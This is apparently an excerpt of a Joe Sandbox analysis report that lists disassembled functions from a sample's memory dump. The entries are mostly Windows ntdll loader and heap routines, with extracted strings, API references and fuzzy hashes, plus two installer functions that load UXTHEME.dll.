                                                  control_flow_graph 620 34537550-34537571 621 34537573-3453758f call 3450e580 620->621 622 345375ab-345375b9 call 34544b50 620->622 627 34574443 621->627 628 34537595-345375a2 621->628 632 3457444a-34574450 627->632 629 345375a4 628->629 630 345375ba-345375c9 call 34537738 628->630 629->622 636 34537621-3453762a 630->636 637 345375cb-345375e1 call 345376ed 630->637 634 34574456-345744c3 call 3458ef10 call 34548f40 RtlDebugPrintTimes BaseQueryModuleData 632->634 635 345375e7-345375f0 call 34537648 632->635 634->635 652 345744c9-345744d1 634->652 635->636 645 345375f2 635->645 640 345375f8-34537601 636->640 637->632 637->635 647 34537603-34537612 call 3453763b 640->647 648 3453762c-3453762e 640->648 645->640 649 34537614-34537616 647->649 648->649 654 34537630-34537639 649->654 655 34537618-3453761a 649->655 652->635 657 345744d7-345744de 652->657 654->655 655->629 656 3453761c 655->656 658 345745c9-345745db call 34542b70 656->658 657->635 659 345744e4-345744ef 657->659 658->629 661 345744f5-3457452e call 3458ef10 call 3454a9c0 659->661 662 345745c4 call 34544c68 659->662 669 34574546-34574576 call 3458ef10 661->669 670 34574530-34574541 call 3458ef10 661->670 662->658 669->635 675 3457457c-3457458a call 3454a690 669->675 670->636 678 34574591-345745ae call 3458ef10 call 3457cc1e 675->678 679 3457458c-3457458e 675->679 678->635 684 345745b4-345745bd 678->684 679->678 684->675 685 345745bf 684->685 685->635
                                                  Strings
                                                  • ExecuteOptions, xrefs: 345744AB
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34574507
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34574530
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3457454D
                                                  • Execute=1, xrefs: 3457451E
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34574460
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 34574592
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: d0f0ddd204646deb1a6f904bd032178b0cfbc220d821f41f3b297cddba51a047
                                                  • Instruction ID: 5c2eb8af9138dff2414517ac598a8224e5863544c2b614de9347e4754c9957b4
                                                  • Opcode Fuzzy Hash: d0f0ddd204646deb1a6f904bd032178b0cfbc220d821f41f3b297cddba51a047
                                                  • Instruction Fuzzy Hash: D1513671E41219AFFF11AAA4EC95FAD77A8EF48341F4044ADE505A7180EB309A41EF60
                                                  Function 3451A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Actx , xrefs: 34567819, 34567880
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 345677DD, 34567802
                                                  • SsHd, xrefs: 3451A304
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 345677E2
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 345678F3
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34567807
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: f84e0c96f8bb3c01265638e0e1790a590ad6aa1c5b1d276efa61da21de87612c
                                                  • Instruction ID: a28b143af662e5f74f03b602aba369b42a61b3bab46f5d3f8115b5ed72c2667a
                                                  • Opcode Fuzzy Hash: f84e0c96f8bb3c01265638e0e1790a590ad6aa1c5b1d276efa61da21de87612c
                                                  • Instruction Fuzzy Hash: 9FE1C274E083018FFB16CE24D89071AB7E5FB85368F504A2DE866CB291DB35DD45EB82
                                                  Function 3451D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Actx , xrefs: 34569315
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34569372
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3456914E, 34569173
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34569153
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34569178
                                                  • GsHd, xrefs: 3451D794
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 83b8be96939302ba619bd5c7de26f4612f76a24aea76da3a9df1185f25fcc0aa
                                                  • Instruction ID: cc15a57cd317e5195c729701b12c586f06f9cb53cb81166dfffd71612123998a
                                                  • Opcode Fuzzy Hash: 83b8be96939302ba619bd5c7de26f4612f76a24aea76da3a9df1185f25fcc0aa
                                                  • Instruction Fuzzy Hash: 46E19C74E04342DFEB10CF18D880B5AB7E4BF88358F504A6DE9968B291D735E948DF92
                                                  Function 3457FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: d6a0b7a07e9d300ed9e7c58d7ce66f8206fe7e291444a91e431ba0fdb1b68dac
                                                  • Instruction ID: 879ec6709b27f0a516e628ae227366d9a8c6973f1ca002a4a3a4bbe6f2b35e84
                                                  • Opcode Fuzzy Hash: d6a0b7a07e9d300ed9e7c58d7ce66f8206fe7e291444a91e431ba0fdb1b68dac
                                                  • Instruction Fuzzy Hash: 34414BBAE01209ABDB01DF99D984AEEBFB5FF48354F100169E914E7340D771AA41EB90
                                                  Function 34509046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@$@ww
                                                  • API String ID: 3446177414-2844824024
                                                  • Opcode ID: 0b5eaeac98fd5cb735dea4955d24a5ffe38e70148c1f092c68e5adfb993938ea
                                                  • Instruction ID: f3e878a89787e10d247b1daf85b5aaffaa15b950f05ca726b88a62aa8a64d017
                                                  • Opcode Fuzzy Hash: 0b5eaeac98fd5cb735dea4955d24a5ffe38e70148c1f092c68e5adfb993938ea
                                                  • Instruction Fuzzy Hash: 32814B75D00269DFEB21DB54CC41BDEB7B8AB44714F0081EAA909B7290E7349E85DFA1
                                                  Function 345AF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: 930143995e48f4d10d13af2833fd9feac766290f4791c7d97d52c0a27dfc57f9
                                                  • Instruction ID: e06d941cd60b07d00c89fb2ab1e5ae3cc2558c05a247821f6fbbb6aab960082c
                                                  • Opcode Fuzzy Hash: 930143995e48f4d10d13af2833fd9feac766290f4791c7d97d52c0a27dfc57f9
                                                  • Instruction Fuzzy Hash: 3671CD36D05688DFDB02CFA8E490AADFBF1FF4A304F448069E485EB252CB359945EB54
                                                  Function 344F6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34559885
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34559843
                                                  • LdrpLoadShimEngine, xrefs: 3455984A, 3455988B
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 34559854, 34559895
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: 1c6712088f4c766df7d7da3aa82da559812a2afaf1dd2cfbc396ca8e1eec2457
                                                  • Instruction ID: 564bfb346a29e3625cadfa16d8a016cc9f20d5d7c8568d91ca80e7fa08964441
                                                  • Opcode Fuzzy Hash: 1c6712088f4c766df7d7da3aa82da559812a2afaf1dd2cfbc396ca8e1eec2457
                                                  • Instruction Fuzzy Hash: E551FF36E00358DFEB04DBA8CC54AAD77A6FB90314F44016AE501FF2A6CB71A842DF85
                                                  Function 3452DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 1fde033e69c7a4b694d528982b1a18fa5633f4f1af5780fb24eb915041f90f76
                                                  • Instruction ID: 259097a0ec3ce424f625bf97e2589d3e4472851c39e0987d34db8b8b094b6d0e
                                                  • Opcode Fuzzy Hash: 1fde033e69c7a4b694d528982b1a18fa5633f4f1af5780fb24eb915041f90f76
                                                  • Instruction Fuzzy Hash: 97412636E04740EFE711CF64D484B59B3A4FF81319F10896DE806977C2CB38A985EB91
                                                  Function 345AECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Entry Heap Size , xrefs: 345AEDED
                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 345AEDE3
                                                  • HEAP: , xrefs: 345AECDD
                                                  • ---------------------------------------, xrefs: 345AEDF9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                  • API String ID: 3446177414-1102453626
                                                  • Opcode ID: 5c1faf9b74b7c5a5755b899ccd66a03412311f199e104784060804b944552fa8
                                                  • Instruction ID: d6da506962557a7b9854900b7f31aff28957b881845b3a354c1eb37d2d74dc25
                                                  • Opcode Fuzzy Hash: 5c1faf9b74b7c5a5755b899ccd66a03412311f199e104784060804b944552fa8
                                                  • Instruction Fuzzy Hash: 71418B79E81611EFDB06CF18D88090ABBE6FF46355B25846DE404EB211D732EC43EB91
                                                  Function 3452DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: 73b55967dc2b4ef826db35a5de38caeaf566a7085d6a49f74297158298fb18c6
                                                  • Instruction ID: 67d66c1d70495bef63baaaf672fd7b8d451ee03d39ead32ab5477d7339774c13
                                                  • Opcode Fuzzy Hash: 73b55967dc2b4ef826db35a5de38caeaf566a7085d6a49f74297158298fb18c6
                                                  • Instruction Fuzzy Hash: BD312736E05BC4DFFB12CB24D928F4977E8EB02754F0048AAE44287AD2CB79A944DF55
                                                  Function 34534C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 34573466
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34573439
                                                  • LdrpFindDllActivationContext, xrefs: 34573440, 3457346C
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3457344A, 34573476
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: 35bbefffdba1c646a3c76ec910c5ea48a19ff95cdd5a2c9911f67e444adf22f7
                                                  • Instruction ID: d3dcbf2ce4517cb4ec986434256a3056b0e50afdb71499bc0d1ffd66942f0b18
                                                  • Opcode Fuzzy Hash: 35bbefffdba1c646a3c76ec910c5ea48a19ff95cdd5a2c9911f67e444adf22f7
                                                  • Instruction Fuzzy Hash: F5312CB6E02359EFFB219B049844B5AB7A4FB13BA6F428379E500A7160D770DC80E791
                                                  Function 00405F0B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                  • wsprintfA.USER32 ref: 00405F5A
                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136219424394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000003.00000002.136219317322.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219535508.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219635683.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219744839.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME
                                                  • API String ID: 2200240437-4069249669
                                                  • Opcode ID: 328398ca082f181730c16b0349dde6f344f9270e4e6bb06fdeaee7a933ca8020
                                                  • Instruction ID: e7aab654e534ef54270f9ee62e2ddc6b6f5892f8449d48162b61027427409848
                                                  • Opcode Fuzzy Hash: 328398ca082f181730c16b0349dde6f344f9270e4e6bb06fdeaee7a933ca8020
                                                  • Instruction Fuzzy Hash: EFF0F070500A096BDB10E7549E0CFDBBBACEB08300F4441BAA685F21C2DB7CD9548FAC
                                                  Function 344FF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  • Opcode ID: 6ec9e652138535f6d9cde0d9898df571dfe57ee5933b41b063dbe4c42f9377e7
                                                  • Instruction ID: 18b7edea350b70977a4c229ebbbae46e4646911541c7813e3c488d4cfc984b4d
                                                  • Opcode Fuzzy Hash: 6ec9e652138535f6d9cde0d9898df571dfe57ee5933b41b063dbe4c42f9377e7
                                                  • Instruction Fuzzy Hash: 5F911371B44740EFFB15CB24CC80F2EB7A9BF84644F4004AAE9419B792DB35E841DB96
                                                  Function 34520AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • LdrpCheckModule, xrefs: 34569F24
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 34569F2E
                                                  • Failed to allocated memory for shimmed module list, xrefs: 34569F1C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  • Opcode ID: 3b070d736c96489e11aa8d1b4c611c5d6617d7ad8b206cb69a179c67a5ea6005
                                                  • Instruction ID: 77b761eaca952ef91201f6d33cd15631b9db865ba9ccce1fe9c869f7b69c5a63
                                                  • Opcode Fuzzy Hash: 3b070d736c96489e11aa8d1b4c611c5d6617d7ad8b206cb69a179c67a5ea6005
                                                  • Instruction Fuzzy Hash: 0771C275E01205DFEB14DF68C880AAEB7F4FB84648F54446EE502E7351E734A942EF51
                                                  Function 345843D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34584508
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 34584519
                                                  • LdrpCheckRedirection, xrefs: 3458450F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  • Opcode ID: 645cb4b9a9e1bbc59e0de41619f21b48efa3179aabe6aef2a1e855e385c7ddbc
                                                  • Instruction ID: e9ad8fc0c27e61878dc8908017248d0170ae186af0e51ed268e7be6b54430bf9
                                                  • Opcode Fuzzy Hash: 645cb4b9a9e1bbc59e0de41619f21b48efa3179aabe6aef2a1e855e385c7ddbc
                                                  • Instruction Fuzzy Hash: 2041B076F057119FDB10CE589840A1677E8AF8A65AB06066DEC58D7262FB30E801AB81
                                                  Function 004065A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                    • Part of subcall function 00405F0B: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                    • Part of subcall function 00405F0B: wsprintfA.USER32 ref: 00405F5A
                                                    • Part of subcall function 00405F0B: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136219424394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000003.00000002.136219317322.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219535508.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219635683.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.136219744839.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                  • API String ID: 2547128583-890815371
                                                  • Opcode ID: ac1671d6a373181f706d936b6052ccd623b887b1efacca4e215c3e588c11afa6
                                                  • Instruction ID: de8a04aa7dd198a7f218550cceadbcddc2fe281ed396dd36e270b18fc18a020b
                                                  • Opcode Fuzzy Hash: ac1671d6a373181f706d936b6052ccd623b887b1efacca4e215c3e588c11afa6
                                                  • Instruction Fuzzy Hash: F2D0C232101125AAC7101F626E0884F7B5DEF653617054436F500B2270EB38C41285BD
                                                  Function 3452EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd55bad7d5a0df96da9883dbc2a0300a54ff0b9ec65779029d6c52ea4a227a2b
                                                  • Instruction ID: 13092c209fcc2a2ac9649c90c3ed207b61dd44555ddbfe3381966f4dfc7bd08f
                                                  • Opcode Fuzzy Hash: dd55bad7d5a0df96da9883dbc2a0300a54ff0b9ec65779029d6c52ea4a227a2b
                                                  • Instruction Fuzzy Hash: C2E1C076E00708DFEB25CFA9E980A9DBBF5BF48344F50452AE546E72A0D770A841EF50
                                                  Function 345058E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 0355b74c6f4c2bf7c52f7c20a83d2b8833ad71f694796ecb8d5033c2b5c76ef0
                                                  • Instruction ID: 7a93e44153543c1107a541951787b705060f2ec5a3e50e73565f0c2bf6a90aef
                                                  • Opcode Fuzzy Hash: 0355b74c6f4c2bf7c52f7c20a83d2b8833ad71f694796ecb8d5033c2b5c76ef0
